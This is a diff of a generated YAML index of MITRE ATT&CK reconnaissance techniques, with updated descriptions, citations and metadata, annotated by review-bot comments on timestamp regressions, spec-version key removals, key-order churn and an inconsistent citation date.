+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
@@ -54411,7 +55088,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
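Review bot: the `modified` timestamp moves backwards here, from `2022-04-25T14:00:00.188Z` to `2021-04-15T03:48:37.628Z`, and the same backward move recurs in the T1597.002, T1590.005, T1596.002, T1596.001, T1591.003, T1592.001, T1590.004, T1590.003, T1597.001, T1595, T1590.006 and T1591.002 hunks below. A regenerated index should not yield older `modified` values unless the upstream STIX bundle itself reverted them; please confirm the generator read the intended ATT&CK release rather than a stale cached bundle, and record the source bundle version in the commit message so this can be checked later.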
@@ -54427,8 +55104,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
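Review bot: dropping both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` leaves this object with no spec-version key at all, whereas the objects fully regenerated in this diff (T1590.002, T1594, T1593.002) end up with `x_mitre_attack_spec_version: 3.2.0`, and T1596 (the `@@ -55197` hunk) keeps `x_mitre_attack_spec_version: 2.1.0` while losing only `spec_version`. Three outcomes for the same pair of keys points to two code paths in the generator; if the intent is only to strip the STIX-level `spec_version`, then `x_mitre_attack_spec_version` should survive here as it does for T1596. The same double removal appears in the T1597.002, T1590.005, T1596.002, T1596.001, T1591.003, T1592.001, T1590.004, T1590.003, T1597.001, T1595, T1590.006 and T1591.002 tail hunks.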
@@ -54450,7 +55125,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54466,8 +55141,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -54495,7 +55168,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54511,33 +55184,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
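Review bot: most of this hunk is key reordering rather than content: `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_platforms` and `x_mitre_is_subtechnique` are deleted and re-added with identical values, which buries the two real changes (the new AXFR zone-transfer paragraph with its three citations, and the `x_mitre_version` bump from `'1.1'` to `'1.2'`). Having the generator emit keys in a stable order (for example sorted, or the upstream STIX order) would make future syncs reviewable; the T1594 and T1593.002 hunks below show the same churn.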
@@ -54551,18 +55224,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
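Review bot: the new `DNS-CISA` reference is internally inconsistent: its description dates the alert `(2016, September 29)` but the URL path reads `.../alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information`. One of the two is wrong; please check the CISA page and align the description date with the URL (or the URL with the date) before this lands, since the citation is what readers will copy.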
@@ -54583,7 +55267,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54599,39 +55283,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
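Review bot: the regenerated `description` for T1594 ends with a trailing space inside the quoted string (`...(Citation: Register Robots TXT 2015) "`), and its scalar style changed from the `|-` block used by every other technique in this file to a double-quoted, line-folded string with literal `\n\n` escapes. The trailing space will survive into any rendered output and the folded form is hard to diff; strip the whitespace at the source and have the generator emit `|-` block scalars consistently, as T1590.002 still does in this same diff.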
@@ -54639,13 +55321,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
@@ -54670,7 +55380,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -54686,8 +55396,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -54709,7 +55417,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -54725,8 +55433,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -54752,7 +55458,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -54770,13 +55476,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -54832,7 +55536,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
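Review bot: the `ACSC Email Spoofing` reference is swapped to a `web.archive.org` snapshot but its `Retrieved October 19, 2020.` date is left unchanged, whereas the `OPM Leak` reference in the T1589 hunk below gets both an archived URL and an updated `Retrieved September 16, 2024.` date. If the retrieval date is meant to record when the archived copy was verified, update it here as well so the two archived references are handled the same way.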
@@ -54883,7 +55587,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -54904,7 +55607,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -54920,8 +55623,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -54943,7 +55644,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -54959,8 +55660,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -54982,7 +55681,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -54998,12 +55697,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55043,8 +55740,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -55089,11 +55786,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55133,9 +55829,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -55197,7 +55892,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -55223,7 +55917,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55244,8 +55938,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -55310,7 +56002,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -55358,7 +56049,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -55380,7 +56070,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
